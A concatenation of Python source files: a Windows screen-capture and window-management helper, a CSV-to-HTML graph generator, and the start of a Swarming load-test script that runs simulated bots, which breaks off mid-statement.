in virtual screen. List is returned in device order, with the first element (0)
representing the primary monitor.
"""
monitors = self._getMonitorInfo()
primary_screen = None
screens = []
for monitor in monitors:
# Convert screen rect to Lackey-style rect (x,y,w,h) as position in virtual screen
screen = {
"rect": (
monitor["rect"][0],
monitor["rect"][1],
monitor["rect"][2] - monitor["rect"][0],
monitor["rect"][3] - monitor["rect"][1]
)
}
screens.append(screen)
return screens
def isPointVisible(self, x, y):
""" Checks if a point is visible on any monitor. """
class POINT(ctypes.Structure):
_fields_ = [("x", ctypes.c_long), ("y", ctypes.c_long)]
pt = POINT()
pt.x = x
pt.y = y
MONITOR_DEFAULTTONULL = 0
hmon = self._user32.MonitorFromPoint(pt, MONITOR_DEFAULTTONULL)
if hmon == 0:
return False
return True
def _captureScreen(self, device_name):
""" Captures a bitmap from the given monitor device name
Returns as a PIL Image (BGR rather than RGB, for compatibility with OpenCV)
"""
## Define constants/structs
class HBITMAP(ctypes.Structure):
_fields_ = [("bmType", ctypes.c_long),
("bmWidth", ctypes.c_long),
("bmHeight", ctypes.c_long),
("bmWidthBytes", ctypes.c_long),
("bmPlanes", ctypes.wintypes.WORD),
("bmBitsPixel", ctypes.wintypes.WORD),
("bmBits", ctypes.wintypes.LPVOID)]
class BITMAPINFOHEADER(ctypes.Structure):
_fields_ = [("biSize", ctypes.wintypes.DWORD),
("biWidth", ctypes.c_long),
("biHeight", ctypes.c_long),
("biPlanes", ctypes.wintypes.WORD),
("biBitCount", ctypes.wintypes.WORD),
("biCompression", ctypes.wintypes.DWORD),
("biSizeImage", ctypes.wintypes.DWORD),
("biXPelsPerMeter", ctypes.c_long),
("biYPelsPerMeter", ctypes.c_long),
("biClrUsed", ctypes.wintypes.DWORD),
("biClrImportant", ctypes.wintypes.DWORD)]
class BITMAPINFO(ctypes.Structure):
_fields_ = [("bmiHeader", BITMAPINFOHEADER),
("bmiColors", ctypes.wintypes.DWORD*3)]
HORZRES = ctypes.c_int(8)
VERTRES = ctypes.c_int(10)
SRCCOPY = 0x00CC0020
CAPTUREBLT = 0x40000000
DIB_RGB_COLORS = 0
## Begin logic
self._gdi32.CreateDCW.restype = ctypes.c_void_p
hdc = self._gdi32.CreateDCW(ctypes.c_wchar_p(str(device_name)), 0, 0, 0)  # Wrap the device name as a wide string for CreateDCW
if hdc == 0:
raise ValueError("Empty hdc provided")
# Get monitor specs
self._gdi32.GetDeviceCaps.argtypes = [ctypes.c_void_p, ctypes.c_int]
screen_width = self._gdi32.GetDeviceCaps(hdc, HORZRES)
screen_height = self._gdi32.GetDeviceCaps(hdc, VERTRES)
# Create memory device context for monitor
self._gdi32.CreateCompatibleDC.restype = ctypes.c_void_p
self._gdi32.CreateCompatibleDC.argtypes = [ctypes.c_void_p]
hCaptureDC = self._gdi32.CreateCompatibleDC(hdc)
if hCaptureDC == 0:
raise WindowsError("gdi:CreateCompatibleDC failed")
# Create bitmap compatible with monitor
self._gdi32.CreateCompatibleBitmap.restype = ctypes.c_void_p
self._gdi32.CreateCompatibleBitmap.argtypes = [ctypes.c_void_p, ctypes.c_int, ctypes.c_int]
hCaptureBmp = self._gdi32.CreateCompatibleBitmap(hdc, screen_width, screen_height)
if hCaptureBmp == 0:
raise WindowsError("gdi:CreateCompatibleBitmap failed")
# Select hCaptureBmp into hCaptureDC device context
self._gdi32.SelectObject.argtypes = [ctypes.c_void_p, ctypes.c_void_p]
self._gdi32.SelectObject(hCaptureDC, hCaptureBmp)
# Perform bit-block transfer from screen to device context (and thereby hCaptureBmp)
self._gdi32.BitBlt.argtypes = [
ctypes.c_void_p,
ctypes.c_int,
ctypes.c_int,
ctypes.c_int,
ctypes.c_int,
ctypes.c_void_p,
ctypes.c_int,
ctypes.c_int,
ctypes.c_ulong
]
self._gdi32.BitBlt(hCaptureDC, 0, 0, screen_width, screen_height, hdc, 0, 0, SRCCOPY | CAPTUREBLT)
# Capture image bits from bitmap
img_info = BITMAPINFO()
img_info.bmiHeader.biSize = ctypes.sizeof(BITMAPINFOHEADER)
img_info.bmiHeader.biWidth = screen_width
img_info.bmiHeader.biHeight = screen_height
img_info.bmiHeader.biPlanes = 1
img_info.bmiHeader.biBitCount = 32
img_info.bmiHeader.biCompression = 0
img_info.bmiHeader.biClrUsed = 0
img_info.bmiHeader.biClrImportant = 0
buffer_length = screen_width * 4 * screen_height
image_data = ctypes.create_string_buffer(buffer_length)
self._gdi32.GetDIBits.restype = ctypes.c_int
self._gdi32.GetDIBits.argtypes = [
ctypes.c_void_p,
ctypes.c_void_p,
ctypes.c_uint,
ctypes.c_uint,
ctypes.c_void_p,
ctypes.c_void_p,
ctypes.c_uint
]
scanlines = self._gdi32.GetDIBits(
hCaptureDC,
hCaptureBmp,
0,
screen_height,
ctypes.byref(image_data),
ctypes.byref(img_info),
DIB_RGB_COLORS)
if scanlines != screen_height:
raise WindowsError("gdi:GetDIBits failed")
final_image = ImageOps.flip(
Image.frombuffer(
"RGBX",
(screen_width, screen_height),
image_data,
"raw",
"RGBX",
0,
1))
# Destroy created device context & GDI bitmap
self._gdi32.DeleteObject.argtypes = [ctypes.c_void_p]
self._gdi32.DeleteObject(hdc)
self._gdi32.DeleteObject(hCaptureDC)
self._gdi32.DeleteObject(hCaptureBmp)
return final_image
def _getMonitorInfo(self):
""" Returns info about the attached monitors, in device order
[0] is always the primary monitor
"""
monitors = []
CCHDEVICENAME = 32
def _MonitorEnumProcCallback(hMonitor, hdcMonitor, lprcMonitor, dwData):
class MONITORINFOEX(ctypes.Structure):
_fields_ = [("cbSize", ctypes.wintypes.DWORD),
("rcMonitor", ctypes.wintypes.RECT),
("rcWork", ctypes.wintypes.RECT),
("dwFlags", ctypes.wintypes.DWORD),
("szDevice", ctypes.wintypes.WCHAR*CCHDEVICENAME)]
lpmi = MONITORINFOEX()
lpmi.cbSize = ctypes.sizeof(MONITORINFOEX)
self._user32.GetMonitorInfoW(hMonitor, ctypes.byref(lpmi))
#hdc = self._gdi32.CreateDCA(ctypes.c_char_p(lpmi.szDevice), 0, 0, 0)
monitors.append({
"hmon": hMonitor,
#"hdc": hdc,
"rect": (lprcMonitor.contents.left,
lprcMonitor.contents.top,
lprcMonitor.contents.right,
lprcMonitor.contents.bottom),
"name": lpmi.szDevice
})
return True
MonitorEnumProc = ctypes.WINFUNCTYPE(
ctypes.c_bool,
ctypes.c_ulong,
ctypes.c_ulong,
ctypes.POINTER(ctypes.wintypes.RECT),
ctypes.c_int)
callback = MonitorEnumProc(_MonitorEnumProcCallback)
if self._user32.EnumDisplayMonitors(0, 0, callback, 0) == 0:
raise WindowsError("Unable to enumerate monitors")
# Clever magic to make the screen with origin of (0,0) [the primary monitor]
# the first in the list
# Sort by device ID - 0 is primary, 1 is next, etc.
monitors.sort(key=lambda x: (not (x["rect"][0] == 0 and x["rect"][1] == 0), x["name"]))
return monitors
def _getVirtualScreenRect(self):
""" The virtual screen is the bounding box containing all monitors.
Not all regions in the virtual screen are actually visible. The (0,0) coordinate
is the top left corner of the primary screen rather than the whole bounding box, so
some regions of the virtual screen may have negative coordinates if another screen
is positioned in Windows as further to the left or above the primary screen.
Returns the rect as (x, y, w, h)
"""
SM_XVIRTUALSCREEN = 76 # Left of virtual screen
SM_YVIRTUALSCREEN = 77 # Top of virtual screen
SM_CXVIRTUALSCREEN = 78 # Width of virtual screen
SM_CYVIRTUALSCREEN = 79 # Height of virtual screen
return (self._user32.GetSystemMetrics(SM_XVIRTUALSCREEN), \
self._user32.GetSystemMetrics(SM_YVIRTUALSCREEN), \
self._user32.GetSystemMetrics(SM_CXVIRTUALSCREEN), \
self._user32.GetSystemMetrics(SM_CYVIRTUALSCREEN))
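# Example: with a 1920x1080 primary monitor and a second 1920x1080 monitor
# positioned to its left, this returns (-1920, 0, 3840, 1080) -- the left
# edge of the virtual screen is negative relative to the primary origin.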
def _getVirtualScreenBitmap(self):
""" Returns a PIL bitmap (BGR channel order) of all monitors
Arranged like the Virtual Screen
"""
# Collect information about the virtual screen & monitors
min_x, min_y, screen_width, screen_height = self._getVirtualScreenRect()
monitors = self._getMonitorInfo()
# Initialize new black image the size of the virtual screen
virt_screen = Image.new("RGB", (screen_width, screen_height))
# Capture images of each of the monitors and overlay on the virtual screen
for monitor_id in range(0, len(monitors)):
img = self._captureScreen(monitors[monitor_id]["name"])
# Capture virtscreen coordinates of monitor
x1, y1, x2, y2 = monitors[monitor_id]["rect"]
# Convert to image-local coordinates
x = x1 - min_x
y = y1 - min_y
# Paste on the virtual screen
virt_screen.paste(img, (x, y))
return virt_screen
## Clipboard functions
def osCopy(self):
""" Triggers the OS "copy" keyboard shortcut """
from .InputEmulation import Keyboard
k = Keyboard()
k.keyDown("{CTRL}")
k.type("c")
k.keyUp("{CTRL}")
def osPaste(self):
""" Triggers the OS "paste" keyboard shortcut """
from .InputEmulation import Keyboard
k = Keyboard()
k.keyDown("{CTRL}")
k.type("v")
k.keyUp("{CTRL}")
## Window functions
def getWindowByTitle(self, wildcard, order=0):
""" Returns a handle for the first window that matches the provided "wildcard" regex """
EnumWindowsProc = ctypes.WINFUNCTYPE(
ctypes.c_bool,
ctypes.POINTER(ctypes.c_int),
ctypes.py_object)
def callback(hwnd, context):
if ctypes.windll.user32.IsWindowVisible(hwnd):
length = ctypes.windll.user32.GetWindowTextLengthW(hwnd)
buff = ctypes.create_unicode_buffer(length + 1)
ctypes.windll.user32.GetWindowTextW(hwnd, buff, length + 1)
if re.search(context["wildcard"], buff.value, flags=re.I) != None and not context["handle"]:
if context["order"] > 0:
context["order"] -= 1
else:
context["handle"] = hwnd
return True
data = {"wildcard": wildcard, "handle": None, "order": order}
ctypes.windll.user32.EnumWindows(EnumWindowsProc(callback), ctypes.py_object(data))
return data["handle"]
def getWindowByPID(self, pid, order=0):
""" Returns a handle for the first window that matches the provided PID """
if pid <= 0:
return None
EnumWindowsProc = ctypes.WINFUNCTYPE(
ctypes.c_bool,
ctypes.POINTER(ctypes.c_int),
ctypes.py_object)
def callback(hwnd, context):
if ctypes.windll.user32.IsWindowVisible(hwnd):
pid = ctypes.c_long()
ctypes.windll.user32.GetWindowThreadProcessId(hwnd, ctypes.byref(pid))
if context["pid"] == int(pid.value) and not context["handle"]:
if context["order"] > 0:
context["order"] -= 1
else:
context["handle"] = hwnd
return True
data = {"pid": pid, "handle": None, "order": order}
ctypes.windll.user32.EnumWindows(EnumWindowsProc(callback), ctypes.py_object(data))
return data["handle"]
def getWindowRect(self, hwnd):
""" Returns a rect (x,y,w,h) for the specified window's area """
rect = ctypes.wintypes.RECT()
if ctypes.windll.user32.GetWindowRect(hwnd, ctypes.byref(rect)):
x1 = rect.left
y1 = rect.top
x2 = rect.right
y2 = rect.bottom
return (x1, y1, x2-x1, y2-y1)
return None
def focusWindow(self, hwnd):
""" Brings specified window to the front """
Debug.log(3, "Focusing window: " + str(hwnd))
SW_RESTORE = 9
if ctypes.windll.user32.IsIconic(hwnd):
ctypes.windll.user32.ShowWindow(hwnd, SW_RESTORE)
ctypes.windll.user32.SetForegroundWindow(hwnd)
def getWindowTitle(self, hwnd):
""" Gets the title for the specified window """
length = ctypes.windll.user32.GetWindowTextLengthW(hwnd)
buff = ctypes.create_unicode_buffer(length + 1)
ctypes.windll.user32.GetWindowTextW(hwnd, buff, length + 1)
return buff.value
def getWindowPID(self, hwnd):
""" Gets the process ID that the specified window belongs to """
pid = ctypes.c_long()
ctypes.windll.user32.GetWindowThreadProcessId(hwnd, ctypes.byref(pid))
return int(pid.value)
def getForegroundWindow(self):
""" Returns a handle to the window in the foreground """
return self._user32.GetForegroundWindow()
## Highlighting functions
def highlight(self, rect, color="red", seconds=None):
""" Simulates a transparent rectangle over the specified ``rect`` on the screen.
Actually takes a screenshot of the region and displays with a
rectangle border in a borderless window (due to Tkinter limitations)
If a Tkinter root window has already been created somewhere else,
uses that instead of creating a new one.
"""
if tk._default_root is None:
Debug.log(3, "Creating new temporary Tkinter root")
temporary_root = True
root = tk.Tk()
root.withdraw()
else:
Debug.log(3, "Borrowing existing Tkinter root")
temporary_root = False
root = tk._default_root
image_to_show = self.getBitmapFromRect(*rect)
app = highlightWindow(root, rect, color, image_to_show)
if seconds == 0:
t = threading.Thread(target=app.do_until_timeout)
t.start()
return app
app.do_until_timeout(seconds)
## Process functions
def isPIDValid(self, pid):
""" Checks if a PID is associated with a running process """
## Adapted from http://stackoverflow.com/questions/568271/how-to-check-if-there-exists-a-process-with-a-given-pid
## Thanks to http://stackoverflow.com/users/1777162/ntrrgc and http://stackoverflow.com/users/234270/speedplane
class ExitCodeProcess(ctypes.Structure):
_fields_ = [('hProcess', ctypes.c_void_p),
('lpExitCode', ctypes.POINTER(ctypes.c_ulong))]
SYNCHRONIZE = 0x100000
PROCESS_QUERY_LIMITED_INFORMATION = 0x1000
process = self._kernel32.OpenProcess(SYNCHRONIZE|PROCESS_QUERY_LIMITED_INFORMATION, 0, pid)
if not process:
return False
ec = ExitCodeProcess()
out = self._kernel32.GetExitCodeProcess(process, ctypes.byref(ec))
if not out:
err = self._kernel32.GetLastError()
if err == 5:
# Access is denied.
logging.warning("Access is denied to get pid info.")
self._kernel32.CloseHandle(process)
return False
elif bool(ec.lpExitCode):
# There is an exit code, it quit
self._kernel32.CloseHandle(process)
return False
# No exit code, it's running.
self._kernel32.CloseHandle(process)
return True
def killProcess(self, pid):
""" Kills the process with the specified PID (if possible) """
SYNCHRONIZE = 0x00100000
PROCESS_TERMINATE = 0x0001
hProcess = self._kernel32.OpenProcess(SYNCHRONIZE|PROCESS_TERMINATE, True, pid)
result = self._kernel32.TerminateProcess(hProcess, 0)
self._kernel32.CloseHandle(hProcess)
def getProcessName(self, pid):
if pid <= 0:
return ""
MAX_PATH_LEN = 2048
proc_name = ctypes.create_string_buffer(MAX_PATH_LEN)
PROCESS_VM_READ = 0x0010
PROCESS_QUERY_INFORMATION = 0x0400
hProcess = self._kernel32.OpenProcess(PROCESS_VM_READ|PROCESS_QUERY_INFORMATION, 0, pid)
#self._psapi.GetProcessImageFileName.restype = ctypes.wintypes.DWORD
self._psapi.GetModuleFileNameExA(hProcess, 0, ctypes.byref(proc_name), MAX_PATH_LEN)
return os.path.basename(proc_name.value.decode("utf-8"))
## Helper class for highlighting
class highlightWindow(tk.Toplevel):
def __init__(self, root, rect, frame_color, screen_cap):
""" Accepts rect as (x,y,w,h) """
self.root = root
tk.Toplevel.__init__(self, self.root, bg="red", bd=0)
## Set toplevel geometry, remove borders, and push to the front
self.geometry("{2}x{3}+{0}+{1}".format(*rect))
self.overrideredirect(1)
self.attributes("-topmost", True)
## Create canvas and fill it with the provided image. Then draw rectangle outline
self.canvas = tk.Canvas(
self,
width=rect[2],
height=rect[3],
bd=0,
bg="blue",
highlightthickness=0)
self.tk_image = ImageTk.PhotoImage(Image.fromarray(screen_cap[..., [2, 1, 0]]))
self.canvas.create_image(0, 0, image=self.tk_image, anchor=tk.NW)
self.canvas.create_rectangle(
2,
2,
rect[2]-2,
rect[3]-2,
outline=frame_color,
width=4)
self.canvas.pack(fill=tk.BOTH, expand=tk.YES)
## Lift to front if necessary and refresh.
self.lift()
self.update()
def do_until_timeout(self, seconds=None):
if seconds is not None:
self.root.after(seconds*1000, self.root.destroy)
self.root.mainloop()
def close(self):
self.root.destroy()
|
graphs.py
|
import os
import sys
import time
import json
from typing import Callable, Any, Tuple, List, Mapping
from multiprocessing import Process
# PACKAGE
from private.graphs import graphers
from private.logs import logDecorator
from private.helpers import pandasHelper, pathsHelper, keysHelper, kwargsHelper, filesHelper
MODULE_NAME = "graphs"
genericLog = logDecorator.genericLog(MODULE_NAME)
@genericLog
def _getGraphDirPathFromType(graphType: str):
GRAPHS_2D_DIR_PATH = pathsHelper.getGraphs2DDirPath()
GRAPHS_3D_DIR_PATH = pathsHelper.getGraphs3DDirPath()
graphTypeToDirPath = {
"2D": GRAPHS_2D_DIR_PATH,
"3D": GRAPHS_3D_DIR_PATH
}
graphDirPath = graphTypeToDirPath[graphType]
return graphDirPath
@genericLog
def _getGraphFuncFromTup(grapherTuple: Tuple) -> Callable:
return grapherTuple[0]
@genericLog
def _getGraphTypeFromTup(grapherTuple: Tuple) -> str:
return grapherTuple[1]
@genericLog
def _getGraphNamesFromTup(grapherTuple: Tuple) -> List[str]:
return grapherTuple[2:]
Graph = Any
@genericLog
def _createGraphHTML(grapherTuple: Tuple, graphs: List, dataFileName: str):
graphType = _getGraphTypeFromTup(grapherTuple)
graphTypeDirPath = _getGraphDirPathFromType(graphType)
graphDirPath = os.path.join(graphTypeDirPath, dataFileName)
graphNames = _getGraphNamesFromTup(grapherTuple)
for graph, name in zip(graphs, graphNames):
HTMLPath = os.path.join(graphDirPath, name)
graph.write_html(HTMLPath)
@genericLog
def _createGraphs(grapherTuple: Tuple, graphInputs: Tuple) -> List[Graph]:
grapherFunc = _getGraphFuncFromTup(grapherTuple)
graphs = grapherFunc(*graphInputs)
return graphs
@genericLog
def _handleGraphCreation(grapherTuples: List[Tuple], graphInputs: Tuple, dataFileName: str):
for grapherTuple in grapherTuples:
graphs = _createGraphs(grapherTuple, graphInputs)
_createGraphHTML(grapherTuple, graphs, dataFileName)
GRAPHERS_DICT = graphers.GRAPHERS_DICT
@genericLog
def _getAllGraphers() -> GRAPHERS_DICT:
allGraphers = graphers.getAllGraphers()
return allGraphers
PandasDataFrame = Any
@genericLog
def _getXAxisFromPandasDataFrame(dataFrame: PandasDataFrame) -> List[int]:
indicesPair = _getIndicesFromPandasDataFrame(dataFrame)
startIndex, endIndex = indicesPair
xAxis = list(range(startIndex, endIndex))
return xAxis
@genericLog
def _getIndicesFromPandasDataFrame(dataFrame: PandasDataFrame) -> Tuple[int, int]:
indicesPair = pandasHelper.getIndicesPairFromPandasDataFrame(dataFrame)
return indicesPair
@genericLog
def _genericGetCSVFilePandasDataFrame(pathKey: str, graphKwargs: dict) -> PandasDataFrame:
CSVFilePath = graphKwargs[pathKey]
dataFrame = pandasHelper.getPandasDataFrameFromCSVPath(CSVFilePath)
return dataFrame
@genericLog
def _getPreCalcFilePandasDataFrame(graphKwargs: dict) -> PandasDataFrame:
PRECALC_KEY = keysHelper.getPreCalcKey()
dataFrame = _genericGetCSVFilePandasDataFrame(PRECALC_KEY, graphKwargs)
return dataFrame
@genericLog
def _getDataFilePandasDataFrame(graphKwargs: dict) -> PandasDataFrame:
CSV_PATH_KEY = keysHelper.getCSVPathKey()
dataFrame = _genericGetCSVFilePandasDataFrame(CSV_PATH_KEY, graphKwargs)
return dataFrame
GRAPHER_KWARG = str
GRAPHER_INPUTS = List[Any]
@genericLog
def _getGrapherKwargToInputs(graphKwargs: dict) -> Mapping[GRAPHER_KWARG, GRAPHER_INPUTS]:
DATA_AXIS_INDICES_KWARG = kwargsHelper.getGrapherDataAxisIndicesKwarg()
PRECALC_AXIS_INDICES_KWARG = kwargsHelper.getGrapherPreCalcAxisIndicesKwarg()
DATA_FILE_KWARG = kwargsHelper.getGrapherDataFileKwarg()
PRECALC_FILE_KWARG = kwargsHelper.getGrapherPrecalcFileKwarg()
dataFilePandasDataFrame = _getDataFilePandasDataFrame(graphKwargs)
# NOTE: the preCalcFile handling below was done in a hurry; it could be moved
# into the path helpers alongside the other paths.
preCalcFile = graphKwargs[keysHelper.getPreCalcKey()]
preCalcFilePandasDataFrame = _getPreCalcFilePandasDataFrame(graphKwargs)
indicesPair = _getIndicesFromPandasDataFrame(dataFilePandasDataFrame)
xAxis = _getXAxisFromPandasDataFrame(dataFilePandasDataFrame)
grapherKwargToInputs = {
DATA_AXIS_INDICES_KWARG : [dataFilePandasDataFrame, xAxis, indicesPair],
PRECALC_AXIS_INDICES_KWARG : [preCalcFilePandasDataFrame, xAxis, indicesPair],
DATA_FILE_KWARG : [dataFilePandasDataFrame],
PRECALC_FILE_KWARG : [preCalcFile]
}
return grapherKwargToInputs
@genericLog
def _getCSVFileName(graphKwargs: dict) -> str:
CSV_FILE_NAME_KEY = keysHelper.getCSVNameKey()
CSVFileName = graphKwargs[CSV_FILE_NAME_KEY]
return CSVFileName
@genericLog
def _createGrapherProcesses(graphKwargs: dict, grapherKwargToInputs: dict) -> List:
CSVFileName = _getCSVFileName(graphKwargs)
all_processes = []
allGraphers = _getAllGraphers()
for grapherKwarg in allGraphers:
grapherTuples = allGraphers[grapherKwarg]
grapherInputs = grapherKwargToInputs[grapherKwarg]
process = Process(target=_handleGraphCreation, args=(grapherTuples, grapherInputs, CSVFileName))
all_processes.append(process)
return all_processes
@genericLog
def _generateAllGraphs(graphKwargs: dict):
grapherKwargToInputs = _getGrapherKwargToInputs(graphKwargs)
# grapherProcesses = _createGrapherProcesses(graphKwargs, grapherKwargToInputs)
# for process in grapherProcesses:
# process.start()
# for process in grapherProcesses:
# process.join()
CSVFileName = _getCSVFileName(graphKwargs)
all_processes = []
allGraphers = _getAllGraphers()
for grapherKwarg in allGraphers:
grapherTuples = allGraphers[grapherKwarg]
grapherInputs = grapherKwargToInputs[grapherKwarg]
_handleGraphCreation(grapherTuples, grapherInputs, CSVFileName)
@genericLog
def _getFileGraphDirsFromFileName(dataFileName: str) -> List[str]:
allGraphDirs = pathsHelper.getAllGraphsDirPaths()
fileGraphDirs = []
for graphDir in allGraphDirs:
fileGraphDir = os.path.join(graphDir, dataFileName)
fileGraphDirs.append(fileGraphDir)
return fileGraphDirs
@genericLog
def _getFileGraphDirsFromKwargs(graphKwargs: dict) -> List[str]:
CSVFileName = _getCSVFileName(graphKwargs)
fileGraphDirs = _getFileGraphDirsFromFileName(CSVFileName)
return fileGraphDirs
@genericLog
def _createGraphDirs(graphKwargs: dict):
fileGraphDirs = _getFileGraphDirsFromKwargs(graphKwargs)
for fileGraphDir in fileGraphDirs:
filesHelper.createDirIfNotExist(fileGraphDir)
@genericLog
def _getFoundHTMLFiles(fileGraphDir: str) -> dict:
foundHTMLFiles = {}
foundFiles = os.scandir(fileGraphDir)
for foundFile in foundFiles:
foundFileName = foundFile.name
foundFilePath = os.path.join(fileGraphDir, foundFileName)
foundHTMLFiles[foundFileName] = foundFilePath
return foundHTMLFiles
@genericLog
def _getGraphKeyToDirPathMapping() -> dict:
graphKeyToDirPathMapping = {}
GRAPH_2D_KEY = keysHelper.getGraph2DKey()
GRAPHS_2D_DIR_PATH = pathsHelper.getGraphs2DDirPath()
GRAPH_3D_KEY = keysHelper.getGraph3DKey()
GRAPHS_3D_DIR_PATH = pathsHelper.getGraphs3DDirPath()
graphKeyToDirPathMapping[GRAPH_2D_KEY] = GRAPHS_2D_DIR_PATH
graphKeyToDirPathMapping[GRAPH_3D_KEY] = GRAPHS_3D_DIR_PATH
return graphKeyToDirPathMapping
@genericLog
def _addGeneratedGraphs(graphKwargs: dict):
graphKwargsCopy = graphKwargs.copy()
graphKeyToDirPathMapping = _getGraphKeyToDirPathMapping()
CSV_FILE_NAME_KEY = keysHelper.getCSVNameKey()
CSVFileName = graphKwargs[CSV_FILE_NAME_KEY]
for graphKey in graphKeyToDirPathMapping:
graphDirPath = graphKeyToDirPathMapping[graphKey]
fileGraphDirPath = os.path.join(graphDirPath, CSVFileName)
HTMLFilesAtDir = _getFoundHTMLFiles(fileGraphDirPath)
graphKwargsCopy[graphKey] = HTMLFilesAtDir
return graphKwargsCopy
@genericLog
def handleGenerateAllGraphs(graphKwargs: dict):
_createGraphDirs(graphKwargs)
_generateAllGraphs(graphKwargs)
graphKwargs = _addGeneratedGraphs(graphKwargs)
return graphKwargs
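# Illustrative sketch (not part of the module): driving the graph pipeline above
# end to end. The concrete kwarg keys come from keysHelper at runtime; the path
# and name arguments below are hypothetical.
def _exampleGenerateGraphsForCSV(csvPath: str, csvName: str, preCalcPath: str) -> dict:
    graphKwargs = {
        keysHelper.getCSVPathKey(): csvPath,
        keysHelper.getCSVNameKey(): csvName,
        keysHelper.getPreCalcKey(): preCalcPath,
    }
    return handleGenerateAllGraphs(graphKwargs)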
|
swarming_load_test_bot.py
|
#!/usr/bin/env python
# Copyright 2013 The LUCI Authors. All rights reserved.
# Use of this source code is governed under the Apache License, Version 2.0
# that can be found in the LICENSE file.
"""Triggers a ton of fake jobs to test its handling under high load.
Generates an histogram with the latencies to process the tasks and number of
retries.
"""
import hashlib
import json
import logging
import optparse
import os
import Queue
import socket
import StringIO
import sys
import threading
import time
import zipfile
ROOT_DIR = os.path.dirname(os.path.dirname(os.path.abspath(
__file__.decode(sys.getfilesystemencoding()))))
sys.path.insert(0, ROOT_DIR)
from third_party import colorama
import swarming
from utils import graph
from utils import net
from utils import threading_utils
# Line too long (NN/80)
# pylint: disable=C0301
OS_NAME = 'Comodore64'
TASK_OUTPUT = 'This task ran with great success'
def print_results(results, columns, buckets):
delays = [i for i in results if isinstance(i, float)]
failures = [i for i in results if not isinstance(i, float)]
print('%sDELAYS%s:' % (colorama.Fore.RED, colorama.Fore.RESET))
graph.print_histogram(
graph.generate_histogram(delays, buckets), columns, ' %.3f')
print('')
print('Total items : %d' % len(results))
average = 0
if delays:
average = sum(delays) / len(delays)
print('Average delay: %s' % graph.to_units(average))
print('')
if failures:
print('%sEVENTS%s:' % (colorama.Fore.RED, colorama.Fore.RESET))
values = {}
for f in failures:
values.setdefault(f, 0)
values[f] += 1
graph.print_histogram(values, columns, ' %s')
print('')
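# Illustrative sketch (not part of the original script): print_results() takes a
# mixed list of float latencies and string event names, which is what the bots
# below produce. The sample values, column width and bucket count are made up.
def example_print_results():
    sample = [0.12, 0.34, 0.56, 'poll_for_test_empty', 'sleep']
    print_results(sample, 80, 10)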
def generate_version(source):
"""Generates the sha-1 based on the content of this zip.
Copied from:
https://code.google.com/p/swarming/source/browse/services/swarming/swarm_bot/zipped_archive.py
"""
result = hashlib.sha1()
with zipfile.ZipFile(source, 'r') as z:
for item in sorted(z.namelist()):
with z.open(item) as f:
result.update(item)
result.update('\x00')
result.update(f.read())
result.update('\x00')
return result.hexdigest()
def calculate_version(url):
"""Retrieves the swarm_bot code and returns the SHA-1 for it."""
# Cannot use url_open() since zipfile requires .seek().
return generate_version(StringIO.StringIO(net.url_read(url)))
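# Illustrative sketch (not part of the original script): generate_version() also
# accepts a path, since zipfile.ZipFile opens file names directly, so the same
# content hash can be computed for a bot archive already on disk. The file name
# below is hypothetical.
def example_version_of_local_zip(path='swarming_bot.zip'):
    return generate_version(path)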
def get_hostname():
return socket.getfqdn().lower().split('.', 1)[0]
class FakeSwarmBot(object):
"""This is a Fake swarm_bot implementation simulating it is running
Comodore64.
It polls for job, acts as if it was processing them and return the fake
result.
"""
def __init__(
self, swarming_url, dimensions, swarm_bot_version_hash, hostname, index,
progress, duration, events, kill_event):
self._lock = threading.Lock()
self._swarming = swarming_url
self._index = index
self._progress = progress
self._duration = duration
self._events = events
self._kill_event = kill_event
self._bot_id = '%s-%d' % (hostname, index)
self._attributes = {
'dimensions': dimensions,
'id': self._bot_id,
# TODO(maruel): Use os_utilities.py.
'ip': '127.0.0.1',
'try_count': 0,
'version': swarm_bot_version_hash,
}
self._thread = threading.Thread(target=self._run, name='bot%d' % index)
self._thread.daemon = True
self._thread.start()
def join(self):
self._thread.join()
def is_alive(self):
return self._thread.is_alive()
def _run(self):
"""Polls the server and fake execution."""
try:
self._progress.update_item('%d alive' % self._index, bots=1)
while True:
if self._kill_event.is_set():
return
data = {'attributes': json.dumps(self._attributes)}
request = net.url_read(self._swarming + '/poll_for_test', data=data)
if request is None:
self._events.put('poll_for_test_empty')
continue
start = time.time()
try:
manifest = json.loads(request)
except ValueError:
self._progress.update_item('Failed to poll')
self._events.put('poll_for_test_invalid')
continue
commands = [c['function'] for c in manifest.get('commands', [])]
if not commands:
# Nothing to run.
self._events.put('sleep')
time.sleep(manifest['come_back'])
continue
if commands == ['UpdateSlave']:
# Calculate the proper SHA-1 and loop again.
# This could happen if the Swarming server is upgraded while this
# script runs.
self._attributes['version'] = calculate_version(
manifest['commands'][0]['args'])
self._events.put('update_slave')
continue
if commands != ['RunManifest']:
self._progress.update_item(
'Unexpected RPC call %s\n%s' % (commands, manifest))
self._events.put('unknown_rpc')
break
store_cmd = manifest['commands'][0]
if not isinstance(store_cmd['args'], unicode):
self._progress.update_item('Unexpected RPC manifest\n%s' % manifest)
self._events.put('unknown_args')
break
result_url = manifest['result_url']
test_run = json.loads(store_cmd['args'])
if result_url != test_run['result_url']:
self._progress.update_item(
'Unexpected result url: %s != %s' %
(result_url, test_run['result_url']))
self._events.put('invalid_result_url')
break
ping_url = test_run['ping_url']
ping_delay = test_run['ping_delay']
self._progress.update_item('%d processing' % self._index, processing=1)
# Fake activity and send pings as requested.
while True:
remaining = max(0, (start + self._duration) - time.time())
if remaining > ping_delay:
# Include empty data to ensure the request is a POST request.
result = net.url_read(ping_url, data={})
assert result == 'Success.', result
remaining = max(0, (start + self._duration) - time.time())
if not remaining:
break
time.sleep(remaining)
# In the old API, r=<task_id>&id=<bot_id> is passed as the url.
data = {
'o': TASK_OUTPUT,
'x': '0',
}
result = net.url_read(manifest['result_url'], data=data)
self._progress.update_item(
'%d processed' % self._index, processing=-1, processed=1)
if not result:
self._events.put('result_url_fail')
else:
assert result == 'Successfully update the runner results.', result
self._events.put(time.time() - start)
finally:
try:
# Unregister itself. Otherwise the server will have tons of fake slaves
# that the admin will have to remove manually.
response = net.url_read(
self._swarming + '/delete_machine_stats',
data=[('r', self._bot_id)])
if response is None:
self._events.put('failed_unregister')
finally:
self._progress.update_item('%d quit' % self._index, bots=-1)
def main():
colorama.init()
parser = optparse.OptionParser(description=sys.modules[__name__].__doc__)
parser.add_option(
'-S', '--swarming',
metavar='URL', default='',
help='Swarming server to use')
parser.add_option(
'--suffix', metavar='NAME', default='', help='Bot suffix name to use')
swarming.add_filter_options(parser)
# Use improbable values to reduce the chance of interfering with real slaves.
parser.set_defaults(
dimensions=[
